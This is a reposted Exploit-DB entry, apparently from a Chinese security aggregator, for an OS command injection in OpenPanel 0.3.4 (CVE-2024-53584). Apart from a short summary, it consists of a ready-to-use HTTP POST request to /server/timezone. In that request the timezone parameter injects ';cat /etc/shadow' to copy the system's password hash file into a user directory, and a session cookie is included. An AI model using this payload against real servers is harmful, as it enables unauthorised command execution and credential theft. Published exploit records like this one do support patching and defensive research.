[webapps] OpenPanel 0.3.4 - OS Command Injection
OpenPanel 0.3.4 存在操作系统命令注入漏洞, 攻击者可通过 POST 请求执行任意系统命令, 影响版本为 0.3.4, 已分配 CVE-2024-53584 编号。 2025-4-14 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:16 收藏
OpenPanel 0.3.4 存在操作系统命令注入漏洞, 攻击者可通过 POST 请求执行任意系统命令, 影响版本为 0.3.4, 已分配 CVE-2024-53584 编号。 2025-4-14 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:16 收藏
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584
POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
文章来源: https://www.exploit-db.com/exploits/52197
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh